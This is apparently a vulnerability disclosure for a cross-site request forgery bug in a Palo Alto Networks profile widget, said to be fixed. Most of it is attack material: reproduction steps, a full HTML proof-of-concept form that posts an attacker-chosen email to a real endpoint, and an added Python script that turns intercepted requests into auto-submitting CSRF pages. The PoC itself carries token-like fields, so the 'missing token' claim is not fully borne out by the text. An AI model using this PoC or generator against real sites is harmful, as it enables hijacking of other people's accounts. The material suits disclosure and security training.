** Note: this vulnerability has already been fixed by the Palo Alto Networks security team
  
# Exploit Title: Missing CSRF Token Leads to Full Account Takeover (all accounts can be hijacked)
# Google Dork: [N/A]  
# Date: [Jul 23 2019]
# Exploit Author: Pankaj Kumar Thakur (Nepal) @Nep_1337_1998  
# Vendor Homepage: https://www.paloaltonetworks.com
# Software Link: N/A  
# Version: [8.0]  
# Tested on: [Parrot OS]  
# CVE : [N/A]  
# Acknowledgement:  
https://www.paloaltonetworks.com/security-researcher-acknowledgement  
  
Summary
----------
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to
execute unwanted actions on a web application in which they are currently
authenticated. CSRF attacks target state-changing requests rather than
theft of data, since the attacker cannot read the response to the forged
request. A state-changing request that is accepted without an unpredictable,
per-session value (an anti-CSRF token) can therefore be replayed from any
site the victim visits while logged in.
  
Steps to reproduce
----------------------
>> The victim must be logged in to their account.

>> For testing purposes I changed the email address on my own account; once
the login email is replaced with an attacker-controlled address, the account
is fully taken over.

If the HTML file below does not work, regenerate it with these steps:

>> Go to the profile settings.

>> Change your profile details.

>> Intercept that request with an intercepting proxy.

>> Generate a CSRF PoC from the intercepted request and open it in a browser
while logged in. The profile details, including the account email address,
are changed.
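The PoC generation step above is usually done with a proxy's "generate CSRF PoC" feature. The following Python script is an added example (not part of the original advisory) that does the same thing from a raw intercepted request: it parses the request, emits an auto-submitting HTML form, and flags any parameter that looks like an anti-CSRF token so the tester remembers to confirm whether the server actually validates it (replay the request with that value altered; if the change is still accepted, the parameter gives no CSRF protection). The sample request, its hostname, cookie and parameter values are constructed for illustration and are not taken from the advisory.

```python
"""Build a CSRF proof-of-concept page from an intercepted POST request.

Added example, not part of the original advisory. The request below is
constructed for illustration: the hostname, cookie and parameter values are
assumptions, not a real capture.
"""
import html
import re
from urllib.parse import parse_qsl

# Constructed sample request: a form-encoded profile-update POST.
SAMPLE_REQUEST = (
    "POST /widget/profile.jsonp HTTP/1.1\r\n"
    "Host: example.test\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Cookie: session=abc123\r\n"
    "\r\n"
    "utf8=%E2%9C%93&form=editProfileForm&access_token=m5xw97v7uy63yqw7"
    "&Business_Email=attacker%40example.test&First_Name__c=Hijacked"
)

# Parameter-name fragments commonly used for synchronizer tokens.
TOKEN_NAME_HINTS = ("token", "csrf", "xsrf", "nonce", "authenticity", "transactionid")


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, url, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    # Assumes the target is served over HTTPS.
    url = "https://" + headers["host"] + path
    return method, url, headers, body


def suspicious_params(params):
    """Return the names of parameters that may be anti-CSRF tokens.

    A parameter is flagged when its name contains a token-like word, or when
    its value is a long alphanumeric string mixing letters and digits (an
    unnamed random value). Each flagged parameter must be tested by replaying
    the request with the value altered before claiming the form is CSRF-able.
    """
    flagged = []
    for name, value in params:
        if any(hint in name.lower() for hint in TOKEN_NAME_HINTS):
            flagged.append(name)
        elif (len(value) >= 16 and re.fullmatch(r"[A-Za-z0-9_-]+", value)
              and re.search(r"\d", value) and re.search(r"[A-Za-z]", value)):
            flagged.append(name)
    return flagged


def build_csrf_poc(raw_request):
    """Return (poc_html, flagged_params) for a form-encoded POST request."""
    method, url, headers, body = parse_request(raw_request)
    if method.upper() != "POST" or "x-www-form-urlencoded" not in headers.get("content-type", ""):
        raise ValueError("only application/x-www-form-urlencoded POST requests are supported")
    params = parse_qsl(body, keep_blank_values=True)
    inputs = "\n".join(
        f'    <input type="hidden" name="{html.escape(n, quote=True)}" '
        f'value="{html.escape(v, quote=True)}" />'
        for n, v in params
    )
    page = (
        "<html>\n<!-- CSRF PoC -->\n<body>\n"
        "<script>history.pushState('', '', '/')</script>\n"
        f'<form action="{html.escape(url, quote=True)}" method="POST">\n'
        f"{inputs}\n"
        '    <input type="submit" value="Submit request" />\n'
        "</form>\n"
        "<script>document.forms[0].submit()</script>\n"
        "</body>\n</html>\n"
    )
    return page, suspicious_params(params)


if __name__ == "__main__":
    poc, flagged = build_csrf_poc(SAMPLE_REQUEST)
    print(poc)
    print("confirm these parameters are not validated server-side:", flagged)
```

Run it as a script to print the PoC page; the flagged list for the sample request contains access_token, which is exactly the kind of value that must be varied in a replay before the missing-token finding is confirmed. Note that the generated page auto-submits, whereas the advisory's PoC below relies on the victim clicking the button.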
  
  
PoC  
---  
  
<html>
<!-- CSRF PoC -->
<!-- Values such as access_token, capture_transactionId, client_id and
     flow_version are the ones captured from the tester's own intercepted
     profile-update request; First_Name__c and Business_Email carry the
     attacker-chosen values that replace the victim's profile details. -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://paloaltonetworks.us.janraincapture.com/widget/profile.jsonp" method="POST">
<input type="hidden" name="utf8" value="&#10003;" />
<input type="hidden" name="access_token" value="m5xw97v7uy63yqw7" />
<input type="hidden" name="capture_screen" value="editProfile" />
<input type="hidden" name="js_version" value="d445bf4" />
<input type="hidden" name="capture_transactionId" value="e3x68i8s4lth5131z1az1zv8nvj4s4laygi5o3m0" />
<input type="hidden" name="form" value="editProfileForm" />
<input type="hidden" name="flow" value="customstandardflow" />
<input type="hidden" name="client_id" value="tcdjg4vtnnbm88w8g72x2ajxvxnb4rmm" />
<input type="hidden" name="redirect_uri" value="http://localhost/" />
<input type="hidden" name="response_type" value="token" />
<input type="hidden" name="flow_version" value="20190502085125375950" />
<input type="hidden" name="settings_version" value="" />
<input type="hidden" name="locale" value="en-US" />
<input type="hidden" name="recaptchaVersion" value="2" />
<input type="hidden" name="Salutation" value="" />
<input type="hidden" name="First_Name__c" value="EMAIL_HIJACKED" />
<input type="hidden" name="Middle_Name__c" value="" />
<input type="hidden" name="Last_Name__c" value="test" />
<input type="hidden" name="suffix" value="" />
<input type="hidden" name="Email_Display_Name" value="hpankajjj" />
<input type="hidden" name="Business_Email" value="pankajTESTHIJACKED@yopmail.com" />
<input type="hidden" name="Personal_Email" value="" />
<input type="hidden" name="Business_Phone" value="9999999999" />
<input type="hidden" name="MobilePhone" value="" />
<input type="hidden" name="Company" value="AbeBooks" />
<input type="hidden" name="Title" value="" />
<input type="hidden" name="Job_Role__c" value="Administrator" />
<input type="hidden" name="Job_Level__c" value="" />
<input type="hidden" name="Address1" value="" />
<input type="hidden" name="Address2" value="" />
<input type="hidden" name="City" value="" />
<input type="hidden" name="Zip_or_Postal_Code" value="" />
<input type="hidden" name="Country" value="India" />
<input type="hidden" name="Alt_State_Province__c" value="" />
<input type="hidden" name="province" value="" />
<input type="hidden" name="Preferred_Communication" value="" />
<input type="hidden" name="language__c" value="en_US" />
<input type="hidden" name="location__c" value="India" />
<input type="hidden" name="BreachPrevention_hidden" value="" />
<input type="hidden" name="BYOD_hidden" value="" />
<input type="hidden" name="CloudSecurity_hidden" value="" />
<input type="hidden" name="Cybersecurity_hidden" value="" />
<input type="hidden" name="DataCenterVirtualization_hidden" value="" />
<input type="hidden" name="EndpointSecurity_hidden" value="" />
<input type="hidden" name="Firewalls_hidden" value="" />
<input type="hidden" name="Mobility_hidden" value="" />
<input type="hidden" name="NetworkSecurity_hidden" value="" />
<input type="hidden" name="NetworkPerimeter_hidden" value="" />
<input type="hidden" name="NextGenerationFirewall_hidden" value="" />
<input type="hidden" name="SaaSSecurity_hidden" value="" />
<input type="hidden" name="ThreatPrevention_hidden" value="" />
<input type="hidden" name="subscribeToNewsAndProductUpdates_hidden" value="" />
<input type="hidden" name="subscribeToEventsAndWebinars_hidden" value="" />
<input type="hidden" name="subscribeToUnit42ThreatResearch_hidden" value="" />
<input type="hidden" name="tab1complete__c" value="true" />
<input type="hidden" name="tab2complete__c" value="false" />
<input type="hidden" name="tab3complete__c" value="false" />
<input type="hidden" name="tab4complete__c" value="false" />
<input type="hidden" name="tab5complete__c" value="false" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
  
  
THANK YOU  
  
PANKAJ KUMAR THAKUR  
  
INDP. Security Researcher | Certified Ethical Hacker | Red Team at SYNACK
Inc | OSCP